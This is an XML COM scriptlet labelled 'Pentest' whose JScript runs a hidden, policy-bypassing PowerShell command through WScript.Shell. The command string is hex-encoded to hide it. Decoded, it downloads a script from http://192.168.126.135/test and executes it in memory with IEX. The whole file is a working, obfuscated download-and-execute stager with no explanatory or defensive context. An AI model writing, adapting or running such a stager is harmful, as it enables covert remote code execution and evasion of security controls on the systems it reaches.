<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
 
<![CDATA[   
var _0x5359=["\x70\x6F\x77\x65\x72\x73\x68\x65\x6C\x6C\x2E\x65\x78\x65\x20\x2D\x77\x20\x68\x69\x64\x64\x65\x6E\x20\x2D\x65\x70\x20\x42\x79\x70\x61\x73\x73\x20\x2D\x6E\x6F\x6C\x6F\x67\x6F\x20\x2D\x6E\x6F\x70\x72\x6F\x66\x69\x6C\x65\x20\x22\x49\x45\x58\x20\x28\x28\x6E\x65\x77\x2D\x6F\x62\x6A\x65\x63\x74\x20\x6E\x65\x74\x2E\x77\x65\x62\x63\x6C\x69\x65\x6E\x74\x29\x2E\x64\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x74\x72\x69\x6E\x67\x28\x27\x68\x74\x74\x70\x3A\x2F\x2F\x31\x39\x32\x2E\x31\x36\x38\x2E\x31\x32\x36\x2E\x31\x33\x35\x2F\x74\x65\x73\x74\x27\x29\x29\x22","\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C"];var c=_0x5359[0]; new ActiveXObject(_0x5359[1]).Run(c,0);
]]>
 
</script>
</registration>
</scriptlet>
